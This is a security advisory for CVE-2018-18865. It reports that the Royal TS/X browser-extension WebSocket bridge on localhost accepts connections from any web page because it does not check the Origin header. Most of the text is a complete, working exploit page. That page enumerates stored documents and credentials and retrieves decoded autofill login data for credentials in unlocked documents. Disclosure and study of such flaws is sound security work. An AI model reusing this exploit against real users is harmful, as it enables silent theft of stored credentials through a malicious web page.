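Title: Royal TS/X - Information Disclosure
Author: Jakub Palaczynski
Date: 10. July 2018
CVE: CVE-2018-18865

Affected product:
=================
Royal TS/X < Royal TS v5 Beta / Royal TSX v4 Beta

Vulnerability - Information Disclosure:
=======================================
Any third-party web page loaded in the user's browser can read credentials stored in Royal TS/X while the browser extension is enabled. The extension talks to the application over a local WebSocket listener (default TCP port 54890), and that listener does not validate the Origin of the WebSocket handshake, so a connection from an arbitrary web page is accepted exactly like one from the extension. Because the listener is on loopback, the attacking page only has to be rendered in a browser on the same machine as Royal TS/X; no network access to the host is needed. The PoC below lists every document and credential the bridge returns and then requests the autofill data for each credential of a document reported as unlocked (`Unlocked: true`).

PoC website:
============
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="utf-8">
  <title>RoyalTS/X Exploit</title>
  <script>
    (function () {
      "use strict";

      // Local WebSocket endpoint the Royal TS/X browser-extension bridge listens on.
      var WS_URI = "ws://127.0.0.1:54890/";
      // Header values copied from the extension's own frames. The bridge does not
      // check where a connection comes from, so a plain page can send the same frames.
      var PLUGIN_VERSION = "1.0.0.0";
      var REQUEST_ID = "aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa";

      var output;

      // Append one line of text to the page. textContent is used deliberately:
      // every value shown here came back from the socket and must not be
      // interpreted as markup by this page.
      function writeToScreen(message) {
        var p = document.createElement("p");
        p.style.wordWrap = "break-word";
        p.textContent = message;
        output.appendChild(p);
      }

      // Same as writeToScreen, with a red "ERROR:" label in front of the text.
      function writeError(detail) {
        var p = document.createElement("p");
        p.style.wordWrap = "break-word";
        var label = document.createElement("span");
        label.style.color = "red";
        label.textContent = "ERROR:";
        p.appendChild(label);
        p.appendChild(document.createTextNode(" " + detail));
        output.appendChild(p);
      }

      // Iterate the values of an array or a plain object (the original PoC used
      // for..in over ResponseData, so either shape is tolerated).
      function values(collection) {
        if (!collection) {
          return [];
        }
        return Object.keys(collection).map(function (key) {
          return collection[key];
        });
      }

      // Serialize one request frame. JSON.stringify keeps key order, so the
      // bytes match the hand-written frames of the original PoC and any
      // quotes inside arguments are escaped correctly.
      function buildRequest(command, args) {
        return JSON.stringify({
          Command: command,
          Arguments: args,
          PluginVersion: PLUGIN_VERSION,
          RequestId: REQUEST_ID
        });
      }

      // Open a fresh connection, send one request and pass the matching reply
      // (a frame whose Command equals the request's) to onReply, then close.
      // onDone(handled) runs when the socket closes, whether or not a reply
      // was seen. One socket per request, as in the original PoC.
      function sendRequest(command, args, onReply, onDone) {
        var handled = false;
        var ws = new WebSocket(WS_URI);
        ws.onopen = function () {
          ws.send(buildRequest(command, args));
        };
        ws.onmessage = function (evt) {
          var reply;
          try {
            reply = JSON.parse(evt.data);
          } catch (e) {
            writeError("unparseable reply: " + evt.data);
            return;
          }
          // Replies carry the command name; ignore anything else on the wire.
          if (!reply || reply.Command !== command) {
            return;
          }
          handled = true;
          onReply(reply);
          ws.close();
        };
        ws.onerror = function () {
          // The error event carries no payload; report the endpoint instead.
          writeError("WebSocket connection to " + WS_URI + " failed");
        };
        ws.onclose = function () {
          if (onDone) {
            onDone(handled);
          }
        };
      }

      // Print the document/credential listing and collect the credential IDs
      // whose autofill data will be requested. Only credentials of documents
      // reported as unlocked are queued, matching the original Unlocked == true check.
      function collectCredentials(reply) {
        var queue = [];
        values(reply.ResponseData).forEach(function (doc) {
          writeToScreen("Name: " + doc.Name);
          writeToScreen("Unlocked: " + doc.Unlocked);
          values(doc.Credentials).forEach(function (cred) {
            writeToScreen("Username: " + cred.UserName);
            writeToScreen("URL: " + cred.URL);
            if (doc.Unlocked === true) {
              queue.push({ id: cred.ID, userName: cred.UserName });
            }
          });
        });
        return queue;
      }

      // Request autofill data for each queued credential, one connection at a
      // time. Each iteration captures its own credential, which fixes the
      // closure bug in the original loop (all handlers saw the last x/y and
      // only one credential was ever fetched).
      function fetchLoginInformation(queue) {
        if (queue.length === 0) {
          writeToScreen("Done.");
          return;
        }
        var next = queue.shift();
        sendRequest("GetLoginInformation", { CredentialId: next.id }, function (reply) {
          // ResponseData is base64 here (the original PoC decoded it with atob);
          // fall back to the raw value if it is not valid base64.
          var data;
          try {
            data = atob(reply.ResponseData);
          } catch (e) {
            data = String(reply.ResponseData);
          }
          writeToScreen("AutoFill Data (" + next.userName + "): " + data);
        }, function () {
          // Continue even if this request failed so the remaining entries are tried.
          fetchLoginInformation(queue);
        });
      }

      function init() {
        output = document.getElementById("output");
        writeToScreen("Let's retrieve some data...");
        var queue = [];
        sendRequest("GetDocuments", null, function (reply) {
          queue = collectCredentials(reply);
        }, function (handled) {
          // Without a document listing there is nothing to fetch.
          if (handled) {
            fetchLoginInformation(queue);
          }
        });
      }

      window.addEventListener("load", init, false);
    })();
  </script>
</head>
<body>
  <h2>RoyalTS/X Exploit</h2>
  <div id="output"></div>
</body>
</html>

Contact:
========
Jakub[dot]Palaczynski[at]gmail[dot]com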